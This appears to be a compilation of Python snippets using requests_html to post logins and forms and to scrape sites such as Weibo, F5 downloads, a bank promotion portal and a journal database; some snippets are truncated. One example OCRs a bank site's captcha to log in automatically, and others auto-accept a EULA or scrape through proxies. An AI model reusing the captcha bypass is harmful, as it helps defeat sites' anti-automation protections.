Example No. 1
def get_hero_stats():
    hero_stats = []
    session = HTMLSession()
    res = session.post(hero_stats_url(), data={
                       'event[]': 86, 'teamcompTypes': 1})
    player_heros = []
    team_heros = []

    # ['gameNumber', 'roundtype', 'player', 'team', 'hero',
    # 'timePlayed', 'matchID', 'playerPic', 'playerName', 'teamPic',
    # 'nameCSFriendly', 'map', 'teamName']
    for result in res.html.search_all("heroStatsArr.concat({})"):
        player_heros += json.loads(result[0])

    # keys = ['gameNumber', 'roundtype', 'team', 'tcString',
    # 'gameWasPlayed', 'map', 'maptype', 'timePlayed', 'matchID']
    for result in res.html.search_all("teamcompsArr.concat({})"):
        team_heros += json.loads(result[0])
    write_json('stats/player_heros.json', player_heros)
    write_json('stats/team_heros.json', team_heros)
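write_json() and hero_stats_url() are project helpers that are not shown in this example. A minimal sketch of a compatible write_json(), assuming it simply dumps the collected lists to disk:

import json

def write_json(path, data):
    # Hypothetical stand-in for the project's helper: dump the data to a JSON file.
    with open(path, 'w', encoding='utf-8') as f:
        json.dump(data, f, ensure_ascii=False, indent=2)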
Example No. 2
r = session.get('https://learn.uwaterloo.ca/d2l/login?&noredirect=1')

user = input('WatIAm ID: ')
pw = getpass()

payload = {
    'nordirect': 1,
    'loginPath': '/d2l/login',
    'UserName': user,
    'Password': pw
}

# Log in through the session; the auth cookies it stores are sent automatically from here on.
r = session.post('https://learn.uwaterloo.ca/d2l/lp/auth/login/login.d2l',
                 data=payload,
                 allow_redirects=False)
# sessionVals = r.cookies.get_dict()

# Go to the home page
r = session.get('https://learn.uwaterloo.ca/d2l/home')
soup = BeautifulSoup(r.content, 'html.parser')

# Find the term ID, which is needed to look up this term's courses.
# The 'calendar' link conveniently ends with it.
calendarURL = soup.find('a', href=lambda href: href and 'calendar' in href)
termID = calendarURL.get('href').split('/')[-1]

# Parse the courses data
courses = session.get(
Example No. 3
    def make_request(self):
        session = HTMLSession()
        response = session.post(BaseRequest.BASE_URL, data=self.params())
        return response
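The method above is a fragment of a class built on BaseRequest, which is not shown. A hedged sketch of the surrounding pieces, with BASE_URL and params() as assumed names taken from the call:

from requests_html import HTMLSession

class BaseRequest:
    BASE_URL = 'https://example.com/api'  # placeholder; the real endpoint is defined elsewhere

    def params(self):
        # Hypothetical payload builder; the original subclasses presumably override this.
        return {}

    def make_request(self):
        session = HTMLSession()
        response = session.post(BaseRequest.BASE_URL, data=self.params())
        return response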
Example No. 4
class Weibo:

    def __init__(self):
        self.BASE_DIR = os.path.split(os.path.realpath(__file__))[0]
        config = configparser.ConfigParser()
        config.read(os.path.join(self.BASE_DIR, 'config.ini'), encoding='utf-8')
        self.WEIBO_ID = config.get("CONFIG", "WEIBO_ID")
        self.TELEGRAM_BOT_TOKEN = config.get("CONFIG", "TELEGRAM_BOT_TOKEN")
        self.TELEGRAM_CHAT_ID = config.get("CONFIG", "TELEGRAM_CHAT_ID")
        self.SESSION = HTMLSession()
        self.SESSION.adapters.DEFAULT_RETRIES = 5  # raise the retry count
        self.SESSION.keep_alive = False  # do not keep idle connections alive
        proxy = config.get("CONFIG", "PROXY")
        self.PROXIES = {"http": proxy, "https": proxy}

    def send_telegram_message(self, text, weibo_link):
        """
        给电报发送文字消息
        """
        headers = {
            'Content-Type': 'application/json',
        }
        data = f'{{"chat_id":"{self.TELEGRAM_CHAT_ID}", "text":"{text}", "reply_markup": {{"inline_keyboard":' \
               f' [[{{"text":"🔗点击查看原微博", "url":"{weibo_link}"}}]]}}}} '
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendMessage'
        try:
            self.SESSION.post(url, headers=headers, data=data.encode('utf-8'), proxies=self.PROXIES)
        except:
            print('    |-网络代理错误,请检查确认后关闭本程序重试')
            time.sleep(99999)

    def send_telegram_photo(self, img_url):
        """
        给电报发送图片
        """
        url = f'https://api.telegram.org/bot{self.TELEGRAM_BOT_TOKEN}/sendPhoto'
        data = dict(chat_id=self.TELEGRAM_CHAT_ID, photo=img_url)

        self.SESSION.post(url, data=data, proxies=self.PROXIES)

    def parse_weibo(self, weibo):
        """
        检查当前微博是否已处理过,如果没处理过则发送博文以及配图到Telegram
        """
        conn = sqlite3.connect(os.path.join(self.BASE_DIR, 'db', 'weibo.db'))
        cursor = conn.cursor()

        sql = "SELECT COUNT(id) AS counts FROM weibo WHERE link = ?"
        cursor.execute(sql, (weibo['link'],))
        result = cursor.fetchone()

        if result[0] <= 0:
            self.send_telegram_message(
                '{}{}'.format(
                    f"[{len(weibo['pics'])}图] " if weibo['pics'] else '',
                    weibo['title'],
                ),
                weibo['link']
            )

            # Push the image URLs to Telegram first so the notification arrives right away
            for pic in weibo['pics']:
                self.send_telegram_photo(pic)

            # After the images have been sent to Telegram, also save a local copy of each
            for pic in weibo['pics']:
                filename = pic[pic.rfind('/') + 1:]
                filename = os.path.join(self.BASE_DIR, 'images', filename)
                wget.download(pic, out=filename)

            sql = "INSERT INTO weibo(summary, link) VALUES(?, ?)"
            cursor.execute(sql, (
                weibo['title'],
                weibo['link'],
            ))
            conn.commit()
            conn.close()

            return True
        else:
            return False

    def test(self):
        print('* 正在检查微博ID是否配置正确')
        url = f'https://m.weibo.cn/api/container/getIndex?containerid=100505{self.WEIBO_ID}'
        try:
            weibo_name = self.SESSION.get(url).json()['data']['userInfo']['screen_name']
            print(f'【正确】当前设置的微博账户为:@{weibo_name}')
        except:
            print('【错误】请重新测试或检查微博数字ID是否正确')

        print('\n* 正在检查代理是否配置正确')
        try:
            status_code = self.SESSION.get('https://www.google.com',proxies=self.PROXIES, timeout=5).status_code
            if status_code == 200:
                print('【正确】代理配置正确,可正常访问')
            else:
                print('【错误】代理无法访问到电报服务器')
        except:
            print('【错误】代理无法访问到电报服务器')
        

    def run(self):
        print(time.strftime('%Y-%m-%d %H:%M:%S 执行完毕', time.localtime()))

        url = f'https://m.weibo.cn/api/container/getIndex?containerid=107603{self.WEIBO_ID}'

        try:
            weibo_items = self.SESSION.get(url).json()['data']['cards'][::-1]
        except:
            print('    |-访问url出错了')
            return
        for item in weibo_items:
            weibo = {}

            weibo['title'] = BeautifulSoup(item['mblog']['text'].replace('<br />', '\n'), 'html.parser').get_text()

            if item['mblog'].get('weibo_position') == 3:  # 3 means a repost (append the repost chain); 1 means an original post
                retweet = item['mblog']['retweeted_status']
                try:
                    weibo['title'] = f"{weibo['title']}//@{retweet['user']['screen_name']}:{retweet['raw_text']}"
                except:
                    weibo['title'] = f"{weibo['title']}//转发原文不可见,可能已被删除"

            try:
                weibo['pics'] = [pic['large']['url'] for pic in item['mblog']['pics']]
            except:
                weibo['pics'] = []

            short_url = item['scheme']
            short_url = short_url[short_url.rindex('/') + 1:short_url.index('?')]
            weibo['link'] = f'https://weibo.com/{self.WEIBO_ID}/{short_url}'

            self.parse_weibo(weibo)
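The class is presumably driven by an entry point elsewhere in the script; a minimal way to run it, using only the methods defined above:

if __name__ == '__main__':
    bot = Weibo()
    bot.test()  # verify the Weibo ID and proxy settings
    bot.run()   # fetch the latest posts and push new ones to Telegram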
Example No. 5
from requests_html import HTMLSession

browser = HTMLSession()
data_login = {'account': '*****@*****.**', 'password': '******'}
url_login_api = 'https://api.mtdhb.org/user/login'
r = browser.post(url_login_api, data=data_login)
print(r.json()['code'])
Example No. 6
class F5Downloads:
    def __init__(self, username, password, default_location='IRELAND'):
        self.username = username
        self.password = password
        self.default_location = default_location
        self._session = None
        self._version_pages = None
        self.new_files = []

    @property
    def session(self):
        if not self._session:
            self._session = HTMLSession()
            self._session.post(
                'https://api-u.f5.com/auth/pub/sso/login/user',
                headers={'Content-Type': 'application/x-www-form-urlencoded'},
                data={
                    'userid': self.username,
                    'passwd': self.password,
                })
        return self._session

    def find_links(self, page, pattern):
        return [(l.text, next(iter(l.absolute_links)))
                for l in page.html.find('a')
                if l.text and l.absolute_links and re.match(pattern, l.text)]

    def follow_specific_link(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']

        matching_links = self.find_links(page, pattern)

        # To proceed in the chain we need exactly one match
        if len(matching_links) != 1:
            logger.error(
                f'Found {len(matching_links)} matches for pattern {pattern}, unable to proceed'
            )
            logger.error('Files found:')
            logger.error(matching_links)
            raise Exception(
                f'Expected exactly one link matching {pattern}, '
                f'found {len(matching_links)}')

        name, url = matching_links[0]
        logger.debug(f'Following {name} with {url}')
        return self.get_page(url)

    def pick_latest_version(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']

        matching_links = self.find_links(page, pattern)

        if not len(matching_links):
            raise Exception(
                f'No versions matching {pattern} found on page {page}')

        versionDict = {}

        # This is an ugly one: strip the dots and treat each version as an
        # integer, then pick the largest one.
        for version, url in matching_links:
            number = version.replace('.', '')
            versionDict[number] = (version, url)

        # Pick the highest number
        version, url = versionDict[max(versionDict, key=int)]
        logger.debug(f'Picking {version} as latest version')

        return self.get_page(url)

    def follow_path(self, page, steps):

        step = steps.pop(0)
        f = step['f']
        args = step['args']
        args['page'] = page

        result = f(**args)

        if not len(steps):
            return result
        elif result:
            return self.follow_path(result, steps)

    # Detect if the EULA exists and circle around it
    def get_page(self, url):
        page = self.session.get(url)
        if len(page.html.find('input#accept-eula')):
            logger.debug('EULA encountered, accepting it')
            page = self.session.get(
                url.replace('https://downloads.f5.com/esd/ecc.sv',
                            'https://downloads.f5.com/esd/eula.sv'))
        return page

    def download_files(self, **kwargs):
        page = kwargs['page']
        pattern = kwargs['pattern']
        download_folder = kwargs['download_folder']
        cb = kwargs['cb']

        # Create folders if needed
        pathlib.Path(download_folder).mkdir(parents=True, exist_ok=True)

        matching_links = self.find_links(page, pattern)

        for name, url in matching_links:
            md5_name, md5_url = next(
                iter(self.find_links(page, rf'^{name}.md5$')), (None, None))

            # Only download if there's a matching md5 file
            if not md5_name:
                raise Exception(f'No matching md5 file found for {name}')

            file_path = f'{download_folder}{name}'
            md5_path = f'{download_folder}{md5_name}'
            self.download_file(md5_path, md5_url)

            if self.md5_sum_ok(md5_path, file_path):
                logger.info('The newest file already exists on disk')
                return file_path
            else:
                self.download_file(file_path, url)
                logger.info(f'Validating {name} against the supplied md5')
                if self.md5_sum_ok(md5_path, f'{download_folder}{name}'):
                    logger.info('Downloaded file successfully')
                    if cb:
                        cb(file_path)
                    return (file_path)
                else:
                    raise Exception(f'Failed to download file {name}')

    def md5_sum_ok(self, md5_file, file):
        if not os.path.exists(md5_file):
            raise Exception(f'{md5_file} does not exist')
        if not os.path.exists(file):
            logger.info(f'{file} does not exist')
            return False
        with open(md5_file, 'r') as f:
            md5sum = re.sub(r' .+\n$', '', f.read())
        file_sum = self.md5(file)

        return md5sum == file_sum

    def md5(self, file_name):
        hash_md5 = hashlib.md5()
        with open(file_name, "rb") as f:
            for chunk in iter(lambda: f.read(4096), b""):
                hash_md5.update(chunk)
        return hash_md5.hexdigest()

    def download_file(self, file_path, url):
        if os.path.exists(file_path):
            os.remove(file_path)
        page = self.get_page(url)
        name, download_url = next(
            iter(self.find_links(page, rf'{self.default_location}')),
            (None, None))
        if (download_url):
            logger.debug(f'Saving file as ./{file_path}')
            with self.session.get(download_url, stream=True) as r:
                r.raise_for_status()
                with open(file_path, 'wb') as f:
                    for chunk in r.iter_content(chunk_size=8192):
                        f.write(chunk)

    def download_geoipdb(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {
                    'pattern': rf'BIG-IP v{version}.x.+'
                },
            }, {
                'f': self.follow_specific_link,
                'args': {
                    'pattern': r'GeoLocationUpdates',
                }
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^ip-geolocation-.+\.zip$',
                    'download_folder': f'./downloads/GeoIP/v{version}/',
                    'cb': cb
                }
            }])

    def download_latest_version(self, version, cb=None):
        return self.follow_path(
            self.get_page('https://downloads.f5.com/esd/productlines.jsp'),
            [{
                'f': self.follow_specific_link,
                'args': {
                    'pattern': rf'BIG-IP v{version}.x.+'
                },
            }, {
                'f': self.pick_latest_version,
                'args': {
                    'pattern': rf'^{version}[\.0-9]+$',
                }
            }, {
                'f': self.download_files,
                'args': {
                    'pattern': rf'^BIGIP-{version}[\.0-9]+.+iso$',
                    'download_folder': f'./downloads/BIG-IP/v{version}/',
                    'cb': cb
                }
            }])
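A hedged usage sketch for the class above; the credentials and the callback are placeholders, and the version string follows the patterns used in the two methods:

f5 = F5Downloads('user@example.com', 'secret')
iso_path = f5.download_latest_version('15', cb=lambda path: print(f'Got {path}'))
geo_zip = f5.download_geoipdb('15')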
Example No. 7
class ActivityHelper():
    def __init__(self, id):
        super().__init__()
        self.id = id
        self.session = HTMLSession()

    def get_captcha(self):
        # fetch the captcha image and OCR the code out of it
        ocr = CaptchaOCR(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/CodeController/kaptcha')
        return ocr.parse(), ocr.get_image_response()

    def login(self):
        code, response = self.get_captcha()
        self.cookie = response.cookies['SESSION']
        print('Cookie: %s' % self.cookie)

        data = {'verifyCode': code, 'cust_id': self.id, 'eventId': ''}
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }

        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/checkVerifyCode',
            data=data,
            headers=headers)

        result = r.html.html
        if result in ('notPassCode', 'overLimit', 'noPass', 'errorFormat'):
            print("Error: ", result)

    def find_all(self):
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer': 'https://mkp-tsbank.cdn.hinet.net/tscccms/login',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie
        }
        r = self.session.get(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            headers=headers)
        activities = r.html.find(
            '.form-item:not(.form-item-selected) input:checkbox[name="event-select"]'
        )
        datas = []

        for item in activities:
            event_values = item.attrs['value'].split('_')
            datas.append({
                'eventId': event_values[0],
                'installmentEvent': event_values[1],
                'regEndDate': datetime.strptime(
                    event_values[2], '%a %b %d %H:%M:%S %Z %Y'
                ).strftime('%Y-%m-%dT%H:%M:%S.000+08:00'),
            })
            print('Selected: %s' % datas)
            break
        return datas

    def select_all(self):
        datas = self.find_all()
        headers = {
            'User-Agent': 'Mozilla/5.0',
            'Referer':
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/select',
            'Content-Type': 'application/json; charset=UTF-8',
            'Cookie': 'SESSION=%s' % self.cookie,
            'Accept': 'text/plain, */*; q=0.01'
        }

        r = self.session.post(
            'https://mkp-tsbank.cdn.hinet.net/tscccms/register/save',
            data=json.dumps(datas),
            headers=headers)

        print('Result: %s' % (int(r.text) == len(datas)))

    def execute(self):
        self.login()
        self.select_all()
Example No. 8
class ArrivaScraper:
    def __init__(self):
        self.url = "https://www.arriva.com.hr/en-us/choose-your-journey"
        self.session = HTMLSession()
        self.data = {
            "post-type": "shop",
            "currentstepnumber": "1",
            "search-from": None,
            "search-to": None,
            "search-datetime": None,
            "ticket-type": "oneway",
        }
        self.html = None
        self.cacher = CacheController()

    def run(self, source, destination, date):
        search = [source, destination, date]
        self.data["search-from"] = search[0]
        self.data["search-to"] = search[1]
        self.data["search-datetime"] = search[2]

        cached_data = self.cacher.getJourneys(search)

        if cached_data:
            return cached_data

        self.html = self.session.post(self.url, self.data).html

        return self.parseData(search)

    def parseData(self, search):
        dep = self.fetchDepartures()
        arr = self.fetchArrivals()
        dur = self.fetchDurations()
        pr = self.fetchPrices()
        carr = self.fetchCarriers()

        journeys = [
            Journey(
                source=search[0],
                destination=search[1],
                date=search[2],
                departure=dep[i] + " h",
                arrival=arr[i] + " h",
                duration=dur[i] + " h",
                price=pr[i],
                carrier=carr[i],
            ) for i in range(len(dep))
        ]

        return self.cacher.cacheJourneys(journeys, search)

    def fetchDepartures(self):
        return [
            dep.find("strong")[0].text.split("-")[0][:-1]
            for dep in self.html.find(".vrijeme-top")
        ]

    def fetchArrivals(self):
        return [
            arr.find("strong")[0].text.split("-")[1][1:]
            for arr in self.html.find(".vrijeme-top")
        ]

    def fetchPrices(self):
        prices = [
            pr.find("a")[0].text.split(",")[0]
            for pr in self.html.find(".cijena") if pr.find("a") != []
        ]
        # `c` is a currency converter instantiated elsewhere in this module
        return [round(c.convert(int(ep), "HRK"), 2) for ep in prices]

    def fetchDurations(self):
        return [dur.text[16:] for dur in self.html.find(".vrijeme-bottom")]

    def fetchCarriers(self):
        return [carr.text[9:] for carr in self.html.find(".prijevoznik")]
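A brief usage sketch, assuming CacheController and Journey behave as used above and that the date string matches what the Arriva search form expects:

scraper = ArrivaScraper()
for journey in scraper.run('Zagreb', 'Split', '2021-07-01'):
    print(journey)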
Example No. 9
from requests_html import HTMLSession

login_url1 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO'

login_url2 = 'https://shibb-idp.georgetown.edu/idp/profile/SAML2/POST/SSO?execution=e1s1'

data = {'j_username': '******', 'j_password': '******'}

s = HTMLSession()

r = s.post(login_url1, data=data)

r.html.render()

r = s.post(login_url2, data=data)

print(r.status_code)

for i in r.cookies:
    print(i)
Example No. 10
class CqvipSpider(object):

    def __init__(self):
        self.base_url = 'http://qikan.cqvip.com/Qikan/Search/Index?'
        self.main_url = 'http://qikan.cqvip.com'
        self.test_url = 'http://qikan.cqvip.com/Search/SearchList'
        self.session = HTMLSession()

        com = CommonSettings()
        self.headers = com.set_common_headers()
        self.keyword = com.set_common_keyword()  # needed later when building searchParamModel
        self.pagesize = com.set_common_pagesize()
        self.csvname = com.set_common_output()[1]

    @retry()
    def post(self, url, data):
        result = self.session.post(url, data=data, timeout=10)
        result.encoding = result.apparent_encoding
        return result

    def get_init_page(self, search_word):
        data = {
            'key': 'U=' + search_word,
            'isNoteHistory': '1',
            'isLog': '1',
            'indexKey': search_word,
            'indexIdentifier': 'U'
        }
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:

                result = self.post(self.base_url, data)

                print('status of init page is %s' % result)
                if result.status_code != 200:
                    attempts += 1
                    print('status.error')
                    print('第' + str(attempts) + '次重试!!')
                    if attempts == 100:
                        break
                else:
                    bsoj = BeautifulSoup(result.text, features='lxml')
                    # print(bsoj)
                    total_count = bsoj.find('input', {'id': 'hidShowTotalCount'})['value']
                    page_count = math.ceil(int(total_count)/self.pagesize)
                    print('总页数为%s页' % page_count)

                    socket.setdefaulttimeout(10)  # time out connections after 10 seconds
                    success = True
                    return total_count, page_count

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('init page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def get_qikan_page(self, search_word):
        containers = []
        null = None  # the JSON payload below uses JS-style null; alias it to Python's None
        total_count, page_count = self.get_init_page(search_word)
        breakpoint = 1
        attempts = 0
        success = False
        while attempts < 100 and not success:
            try:
                while breakpoint <= page_count:
                    container = []
                    print('正在爬取第%s页...' % breakpoint)
                    searchParamModel = json.dumps({
                        "ObjectType": 1, "SearchKeyList": [], "SearchExpression": null,
                        "BeginYear": null, "EndYear": null, "UpdateTimeType": null,
                        "JournalRange": null, "DomainRange": null, "ClusterFilter": "",
                        "ClusterLimit": 0, "ClusterUseType": "Article",
                        "UrlParam": "U=" + self.keyword, "Sort": "0", "SortField": null,
                        "UserID": "0", "PageNum": breakpoint, "PageSize": self.pagesize,
                        "SType": null, "StrIds": null, "IsRefOrBy": 0,
                        "ShowRules": "  任意字段=" + self.keyword + "  ",
                        "IsNoteHistory": 0, "AdvShowTitle": null, "ObjectId": null,
                        "ObjectSearchType": 0, "ChineseEnglishExtend": 0, "SynonymExtend": 0,
                        "ShowTotalCount": int(total_count), "AdvTabGuid": ""})
                    # print(searchParamModel)
                    data = {
                        'searchParamModel': searchParamModel
                    }

                    result = self.post(self.test_url, data)
                    print('status of qikan page is %s' % result)

                    if result.status_code != 200:
                        attempts += 1
                        print('qikan.status.error')
                        print('第' + str(attempts) + '次重试!!')
                        if attempts == 100:
                            break
                    else:
                        soup = BeautifulSoup(result.text, features='lxml')
                        # print(soup)
                        simple_div = soup.find('div', {'class': 'simple-list'})
                        # print(simple_div)
                        dls = simple_div.findAll('dl')
                        for dl in dls:
                            field = {}
                            dt = dl.find('dt')
                            if dt.find('span', {'class': 'cited'}):
                                cited_span = dt.find('span', {'class': 'cited'})
                                cited = cited_span.find('a')['data-zkbycount']
                                field['cited'] = cited
                            else:
                                cited = '0'
                                field['cited'] = cited

                            download = self.main_url + dt.find('a')['href']
                            field['download'] = download

                            container.append(field)

                    containers.extend(container)
                    print('第%s页爬取结束!' % breakpoint)
                    breakpoint += 1
                    if breakpoint > page_count:
                        print('已爬取结束, 共%s页' % (breakpoint-1))
                    else:
                        print('新断点记录为第%s页' % breakpoint)

                socket.setdefaulttimeout(10)  # time out connections after 10 seconds
                success = True
                return containers

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('qikan page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def get_detail_page(self, search_word):
        breakpoint = 0
        attempts = 0
        repos = []
        success = False
        containers = self.get_qikan_page(search_word)
        while attempts < 100 and not success:
            try:
                while breakpoint < len(containers):
                    repo = {}
                    cited = containers[breakpoint]['cited']
                    repo['cited'] = cited
                    download = containers[breakpoint]['download']
                    repo['download'] = download
                    print('正在爬取链接为:%s' % download)

                    abuyun = AbuyunProxy()
                    proxy_handler = abuyun.urllib_proxy_settings()[1]
                    opener = urllib.request.build_opener(proxy_handler)
                    urllib.request.install_opener(opener)

                    request = urllib.request.Request(download, headers=self.headers)
                    print('status of detail page is %s' % request)
                    html = urllib.request.urlopen(request, timeout=10).read()
                    soup = BeautifulSoup(html, 'lxml')
                    # print('detail page is parsed as \n%s' % soup)

                    if soup.find('div', {'class': 'article-title'}):
                        title_div = soup.find('div', {'class': 'article-title'})
                        raw_title = title_div.find('h1').get_text()
                        raw_title1 = re.sub('预览', '', raw_title).strip().replace('\r', '').replace('\n', '')
                        title = re.sub('被引量.*', '', raw_title1).strip()
                        print(title)
                        repo['title'] = title
                    else:
                        title = 'N/A'
                        repo['title'] = title

                    article_div = soup.find('div', {'class': 'article-detail'})
                    abstract_div = article_div.find('div', {'class': 'abstract'})

                    if abstract_div.find('span', {'class': 'abstract'}):
                        abstract = abstract_div.find('span', {'class': 'abstract'}).get_text().replace('\r', '').replace('\n', '').strip('\'').replace(',', ',')
                        print(abstract)
                        repo['abstract'] = abstract
                    else:
                        abstract = 'N/A'
                        repo['abstract'] = abstract

                    author_div = article_div.find('div', {'class': 'author'})
                    if author_div.find('span'):
                        raw_author = author_div.findAll('span')[1].get_text().replace('\n', ';')
                        raw_author1 = re.sub('^;|;$', '', raw_author)
                        author = raw_author1.replace(';', ' ')
                        print(author)
                        repo['author'] = author
                    else:
                        author = 'N/A'
                        repo['author'] = author

                    if article_div.find('div', {'class': 'organ'}):
                        info_div = article_div.find('div', {'class': 'organ'})
                        if info_div.find('span'):
                            raw_info = info_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', ';')
                            info = re.sub('^;|;$', '', raw_info)
                            print(info)
                            repo['info'] = info
                        else:
                            info = 'N/A'
                            repo['info'] = info
                    else:
                        info = 'N/A'
                        repo['info'] = info

                    if article_div.find('div', {'class': 'journal'}):
                        date_div = article_div.find('div', {'class': 'journal'})
                        if date_div.find('span', {'class': 'vol'}):
                            raw_date = date_div.find('span', {'class': 'vol'}).get_text().strip('\n').strip('\'').strip('').strip()
                            date = re.search('^.*年', raw_date).group()
                            print(date)
                            repo['date'] = date
                        else:
                            date = 'N/A'
                            repo['date'] = date
                    else:
                        date = 'N/A'
                        repo['date'] = date

                    source = '维普期刊'
                    repo['source'] = source

                    downed = '暂无'
                    repo['downed'] = downed

                    if article_div.find('div', {'class': 'fund'}):
                        fund_div = article_div.find('div', {'class': 'fund'})
                        funds = []
                        if fund_div.find('span'):
                            if len(fund_div.findAll('span')) > 2:
                                fund_span = fund_div.findAll('span')[1:]
                                for span in fund_span:
                                    fund_piece = span.get_text().replace('\r', '').replace('\n', '').strip()
                                    funds.append(fund_piece)
                                fund = ';'.join(funds)
                                print(fund)
                                repo['fund'] = fund
                            else:
                                fund = fund_div.findAll('span')[1].get_text().replace('\r', '').replace('\n', '').strip().replace(',', ',')
                                repo['fund'] = fund
                        else:
                            fund = 'N/A'
                            repo['fund'] = fund
                    else:
                        fund = 'N/A'
                        repo['fund'] = fund

                    if article_div.find('div', {'class': 'subject'}):
                        kws_div = article_div.find('div', {'class': 'subject'})
                        kwss = []
                        if kws_div.find('span'):
                            if len(kws_div.findAll('span')) > 2:
                                kws_span = kws_div.findAll('span')[1:]
                                for span in kws_span:
                                    kws_piece = span.get_text()
                                    kwss.append(kws_piece)
                                kws = ';'.join(kwss)
                                repo['kws'] = kws
                            else:
                                kws = kws_div.findAll('span')[1].get_text()
                                repo['kws'] = kws
                        else:
                            kws = 'N/A'
                            repo['kws'] = kws
                    else:
                        kws = 'N/A'
                        repo['kws'] = kws
                    repos.append(repo)
                    print('第%s篇论文爬取结束!' % breakpoint)
                    breakpoint += 1
                    if breakpoint == len(containers):
                        print('已爬取结束, 共%s页' % (breakpoint-1))
                    else:
                        print('新断点记录为第%s页' % breakpoint)

                socket.setdefaulttimeout(10)  # time out connections after 10 seconds
                success = True
                print(repos)
                return repos

            except OSError as e:  # remember to enable proxy connection
                attempts += 1
                print('detail page callback: %s' % e)
                print('第' + str(attempts) + '次重试!!')
                if attempts == 100:
                    break

    def save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            sheet = pyexcel.Sheet()
            for data in csv_data:
                sheet.row += pyexcel.get_sheet(adict=data, transpose_after=True)
            sheet.colnames = ['title', 'author', 'source', 'info', 'date', 'kws', 'cited', 'downed', 'abstract', 'fund', 'download']
            print(sheet)
            sheet.save_as(self.csvname)

        except Exception as e:
            print('404 error!%s' % e)

    def pandas_save_data(self, search_word):
        try:
            csv_data = self.get_detail_page(search_word)
            dataframe = pd.DataFrame(csv_data)
            print(dataframe)
            dataframe.to_csv(self.csvname, index=False, sep=',', encoding='utf-8')
            print('data saved')

        except Exception as e:
            print('404 error!%s' % e)
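A hedged entry point for the spider; the search word is a placeholder, and CommonSettings is assumed to supply the headers, page size and output file name:

if __name__ == '__main__':
    spider = CqvipSpider()
    spider.pandas_save_data('风电')  # placeholder search term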
Example No. 11
from requests_html import HTMLSession

from Constants import *

session = HTMLSession()

session.post(loginUrl, loginInfo)


def get_verification_token(r):
    verification_token = r.html.find('input', first=True).attrs['value']
    return verification_token


def create_crises():
    r = session.get(createCrisesUrl)
    verification_token = get_verification_token(r)
    payload = create_crises_info(verification_token)
    return_action(CREATE, payload, createCrisesUrl)


def return_action(action, payload, url):
    session.post(url, data=payload, headers=headers)


def get_crises(properties):
    r = session.get(crisesListUrl)
    links = [x for x in r.html.absolute_links if properties in x]
    return links
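Everything imported from Constants (loginUrl, loginInfo, createCrisesUrl, crisesListUrl, headers, CREATE) and the create_crises_info() helper are defined elsewhere. Hypothetical placeholders, purely to show the shapes this snippet expects:

# Hypothetical values; the real ones live in the Constants module.
loginUrl = 'https://example.com/login'
loginInfo = {'username': 'user', 'password': 'secret'}
createCrisesUrl = 'https://example.com/crises/create'
crisesListUrl = 'https://example.com/crises'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
CREATE = 'create'

def create_crises_info(verification_token):
    # Hypothetical payload builder keyed on the anti-forgery token.
    return {'__RequestVerificationToken': verification_token}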

Example No. 12
class AnchorInfo(object):
    def __init__(self, env):
        self.url = 'http://www.darenji.com/search.html'
        self.headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
            'Referer': 'http://www.darenji.com/search.html',
        }
        self.env_dict = environments.get(env)
        self.r = redis.StrictRedis.from_url(
            url=self.env_dict.get('redis_url'))
        self.client = MongoClient(self.env_dict.get('mongodb_host'),
                                  port=self.env_dict.get('mongodb_port'))
        self.db = self.client['pltaobao']
        self.session = HTMLSession()

    def save_data(self, id, nickname, fansCount, anchorPhoto, houseId,
                  descText):
        self.r.sadd('anchorId', str(id))
        self.r.sadd('anchorName', nickname)
        collection = self.db['anchor_info']
        res = collection.find_one({'anchorId': str(id)})
        if not res:
            data = {
                'anchorId': str(id),
                'anchorName': nickname,
                'houseId': int(houseId),
                'fansCount': int(fansCount),
                'liveCount': None,
                'city': None,
                'creatorType': None,
                'darenScore': None,
                'descText': descText,
                'anchorPhoto': anchorPhoto,
                'organId': None,
                'fansFeature': None,
                'historyData': None,
            }
            collection.insert_one(data)

    def get_data(self, anchor_name):

        try:
            rs = self.session.post(url=self.url,
                                   headers=self.headers,
                                   data={'conditions': anchor_name},
                                   timeout=3)
        except:
            return None

        find_count = rs.html.xpath('//*[@id="qcount"]/text()')[0]

        if find_count == '0':
            return None

        nick_list = rs.html.xpath('//*[@id="nickname"]/text()')
        anchorPhoto_list = rs.html.xpath('//*[@id="paginate"]/li/div/a/@style')
        fans_num = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[1]/h1/span/text()')
        house_id = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[1]/p/span/text()')
        desc_text = rs.html.xpath(
            '//*[@id="paginate"]/li/div/div[2]/div[1]/p/text()')

        for index, nick in enumerate(nick_list):
            id = anchorPhoto_list[index].split('/')[5]
            nickname = nick_list[index].replace(' ', '').replace("\n", "")
            fansCount = fans_num[index].replace(' 粉丝数量:', '')
            anchorPhoto = anchorPhoto_list[index].replace(
